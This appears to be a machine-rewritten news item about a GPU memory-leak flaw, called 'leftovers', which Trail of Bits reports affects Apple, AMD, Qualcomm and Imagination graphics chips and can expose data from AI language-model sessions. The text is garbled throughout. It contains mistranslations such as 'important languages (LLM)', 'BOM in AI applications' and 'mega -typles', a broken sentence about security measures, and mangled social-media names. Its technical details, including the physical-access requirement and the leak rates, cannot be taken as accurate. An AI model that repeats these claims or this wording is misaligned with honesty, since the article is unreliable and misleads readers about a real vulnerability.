- A new security defect in popular GPUs has been found by safety researchers who potentially have an impact on the large language models of AI (LLMS).
- Although the new attack method requires physical access to the GPU, it opens up major implications for the growing adoption of AI tools.
Researchers from the Cybersecurity Company Trail of Bits have found a major security defect in popular graphic processing units (GPU) which allows threat actors to extract data from the graphics card, regardless of its creation method. The threat could lead to a significant data leak, which is a major problem, especially for users of automatic learning and important languages (LLM).
This is particularly worrying because of the BOM in AI applications in recent months. Vulnerability allows malicious actors to listen to interactive user sessions, with an exposure rate from 5 to 180 mega -typles.
See more: American federal agencies send warnings to AndroxGh0st Malware Botnet
The problem known as leftovers has an impact on GPUs of popular brands such as imagination, Apple, AMD and Qualcomm. Apple, Qualcomm and Google have made fixes for certain devices, but others can remain assigned. Nvidia and Arm said the problem had no impact on their GPUs.
Vulnerability requires a threat player to have physically access to the GPU, but some of the most common security measures. The problem highlights the need for IA and ML security experts to review rigorous development batteries.
What do you think of the potential threats of AI data leaks? We would be delighted to hear you! Let us know your thoughts on Liendin,, XOr Facebook. We would be delighted to hear you!
Image source: Shutterstock